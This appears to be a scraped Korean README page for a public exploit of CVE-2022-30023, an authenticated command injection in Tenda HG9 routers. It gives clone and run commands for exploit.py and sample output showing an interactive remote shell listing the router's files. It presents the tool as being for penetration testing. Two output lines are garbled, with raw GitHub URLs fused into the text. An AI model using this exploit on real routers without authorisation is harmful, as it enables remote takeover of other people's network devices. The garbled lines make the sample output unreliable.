
Tenda HG9 라우터에 대한 인증된 명령 주입 익스플로잇입니다. Python 스크립트를 통해 대화형 원격 셸 접근을 제공하여 침투 테스트 및 취약점 검증에 사용합니다.
Tenda HG9 라우터에서의 인증된 명령 주입
git clone https://github.com/Haniwa0x01/CVE-2022-30023
cd CVE-2022-30023
python exploit.py -u http://target -U "user" -P "password"
pc@pc-note:~/CVE-2022-30023/$ python3 exploit.py -u "http://10.0.0.1" -U "admin" -P "admin"
[!]: https://raw.githubusercontent.com/haniwa0x01/cve-2022-30023/main/Logged!
[CMD]: ls -la
drwxrwxr-x 3 admin root 54 Jan 25 2021 .
drwxrwxr-x 3 admin root 28 Jan 25 2021 ..
-rwxrwxr-x 1 admin root 6306 Jan 25 2021 boa.conf
drwxrwxr-x 6 admin root 5129 Jan 25 2021 web
[CMD]:
https://raw.githubusercontent.com/haniwa0x01/cve-2022-30023/main/%60%60%60